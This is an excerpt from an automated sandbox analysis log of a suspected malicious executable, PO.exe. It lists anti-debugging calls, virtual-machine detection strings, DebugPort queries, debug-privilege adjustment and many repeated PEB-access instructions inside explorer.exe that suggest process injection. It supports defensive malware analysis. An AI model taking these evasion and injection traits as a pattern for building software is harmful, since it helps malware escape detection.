Source: C:\Users\user\Desktop\PO.exe Code function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,
Source: C:\Users\user\Desktop\PO.exe Code function: 0_2_004026BC FindFirstFileA,
Source: explorer.exe, 00000003.00000000.259578137.000000000891C000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000003.00000002.503553523.0000000003710000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.259320377.0000000008270000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000003.00000002.503675832.0000000003755000.00000004.00000001.sdmp Binary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000003.00000002.503705754.0000000003767000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000003.00000002.503675832.0000000003755000.00000004.00000001.sdmp Binary or memory string: AASCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000003.00000000.245750611.00000000011B3000.00000004.00000020.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: explorer.exe, 00000003.00000000.259630754.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: explorer.exe, 00000003.00000000.255125796.00000000053C4000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
Source: explorer.exe, 00000003.00000000.259320377.0000000008270000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000003.00000000.259320377.0000000008270000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000003.00000000.259630754.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
Source: explorer.exe, 00000003.00000000.259320377.0000000008270000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\PO.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\PO.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\explorer.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_00409A90 rdtsc
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_0040ACD0 LdrLoadDll,
Source: C:\Users\user\Desktop\PO.exe Code function: 0_2_73351000 Ivlfdpdlcleoxmzl,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,
Source: C:\Users\user\Desktop\PO.exe Code function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CA9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CB849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D23884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D23884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CDF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CDF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CDF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D3C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D3C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CDA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CC0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CC0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CC746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D71074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D62073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D74015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D74015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D27016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D27016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D27016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D26C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D26C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D26C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D26C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D7740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D7740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D7740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CBB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CBB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CBB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CBB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CDBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D26DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D26DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D26DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D26DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D26DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D26DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D58DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CAB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CAB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CAB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CBD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CBD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D341E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CA2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CA2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CA2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CA2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CA2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CDA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CCC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CDFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CDFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D269A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D705AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D705AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CCB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CCB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D23540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CC7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CAC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CAB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CAB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CCC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CCC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CA9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CA9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CA9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D78D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D2A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CC4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CC4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CC4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CC4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CC4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CAAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D78ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D5FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CB76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D3FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CDD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CDD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CA52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CA52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CA52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CA52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CA52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D70EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D70EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D70EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D246A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CBAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CBAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CDFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D34257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CA9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CA9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CA9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CA9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CB7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CB7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CB7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CB7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CB7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CB7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CB766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D5B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D5B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D78A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CCAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CCAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CCAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CCAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CCAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CB8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CAC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CAC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CAC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CC3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CDA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CDA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CA5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CA5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CA5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CA5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CAAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CAAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D61608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D5FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CAE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D253CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D253CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CCDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CB1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CB1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D27794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D27794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D27794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D5D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D6138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CDB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CB8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeProcess token adjusted: Debug
